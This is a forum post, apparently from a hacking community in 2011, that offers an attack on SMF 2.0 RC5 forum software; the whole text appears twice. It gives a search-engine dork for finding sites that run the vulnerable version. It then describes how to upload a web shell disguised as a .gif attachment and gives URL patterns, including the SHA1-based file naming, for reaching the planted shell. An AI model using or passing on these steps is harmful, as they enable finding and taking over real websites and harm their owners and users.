SMF 2.0 RC5 Remote Shell Upload Exploit 04-19-2011, 06:41 PM
#1
hi guys i m new in this community i m going to share something ...i did any mistake plzz dont comment wid abusive..ok lets start
Go0Gle D0rk : "Powered by SMF 2.0 RC5 "
# Exploit :
You Are Can Upload The Shell in (attachments) Folder from 'SMF 2.0 RC5'
(+) In Any Topic .. Submit New Reply and Upload Shell (*.gif) on Attachment
(+) After Reply .. You Are Can Acess to Shell in :
> http://[target/Path]/attachments/{fileID}_{fileHASH}
> The HASH Is encoder by : SHA1
(+) Because the 'SMF 2.0 RC5' Change the Any Attach name Ex :
'1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca' << This is From Ex file I'm uploaded From My Local SMF
(+) After You Are Detect The SHA HASH .. acess in the shell !
Usage : http://127.0.0.1:8888/smf/attachments/1_...8c1d07faca
OR acess in this url :
> http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
but this acess with URL not suceeding always plz dont forget to comment...:p
Go0Gle D0rk : "Powered by SMF 2.0 RC5 "
# Exploit :
You Are Can Upload The Shell in (attachments) Folder from 'SMF 2.0 RC5'
(+) In Any Topic .. Submit New Reply and Upload Shell (*.gif) on Attachment
(+) After Reply .. You Are Can Acess to Shell in :
> http://[target/Path]/attachments/{fileID}_{fileHASH}
> The HASH Is encoder by : SHA1
(+) Because the 'SMF 2.0 RC5' Change the Any Attach name Ex :
'1_86e1d5b5ec318635ec9ece9b4586bd8c1d07faca' << This is From Ex file I'm uploaded From My Local SMF
(+) After You Are Detect The SHA HASH .. acess in the shell !
Usage : http://127.0.0.1:8888/smf/attachments/1_...8c1d07faca
OR acess in this url :
> http://[target/Path]/index.php?action=dlattach;topic={topicID};attach={attach-SHELL-id};image
but this acess with URL not suceeding always plz dont forget to comment...:p
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)